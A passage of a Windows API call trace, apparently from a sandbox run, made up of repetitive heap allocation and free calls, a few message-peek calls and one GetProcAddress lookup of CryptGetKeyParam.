0x9aa4f8 [0183.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0183.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0183.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0183.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0183.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0183.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0183.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0183.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0183.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0183.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0183.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0183.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0183.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0183.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0183.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0183.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0183.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0183.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0183.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0183.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0183.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0183.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0183.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0183.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.824] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0183.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0183.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0183.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0183.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0183.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0183.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0183.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0183.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0183.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0183.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0183.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0183.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0183.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0183.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0183.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0183.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0183.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0183.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0183.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0183.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0183.826] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0183.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0183.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0183.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0183.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0183.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0183.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0183.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0183.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0183.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0183.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0183.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0183.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0183.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0183.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0183.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd570 [0183.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0183.827] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0183.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0183.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0183.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0183.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0183.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0183.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0183.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0183.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0183.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0183.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0183.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0183.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0183.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0183.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0183.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0183.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0183.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0183.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0183.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0183.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0183.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0183.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0183.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0183.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0183.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0183.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0183.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0183.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0183.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0183.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0183.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0183.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0183.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0183.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0183.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0183.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0183.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0183.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0183.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0183.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0183.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0183.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0183.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0183.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0183.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0183.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0183.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0183.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0183.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0183.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0183.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0183.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0183.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0183.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0183.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0183.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0183.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0183.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0183.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0183.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0183.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0183.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0183.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0183.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0183.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0183.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0183.831] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0183.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0183.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0183.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0183.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0183.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0183.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0183.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0183.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0183.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0183.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0183.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0183.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0183.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0183.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0183.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0183.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0183.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0183.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0183.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0183.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0183.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0183.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0183.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0183.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0183.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0183.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0183.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0183.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0183.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0183.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0183.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0183.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0183.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0183.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0183.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0183.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0183.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0183.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0183.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0183.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0183.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0183.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0183.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0183.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0183.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0183.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0183.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0183.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0183.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0183.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0183.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0183.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0183.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0183.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0183.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0183.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0183.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0183.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d440 [0183.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0183.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0183.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0183.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0183.834] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0183.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0183.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0183.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0183.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0183.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0183.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0183.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0183.835] RtlAllocateHeap (HeapHandle=0x8a0000, 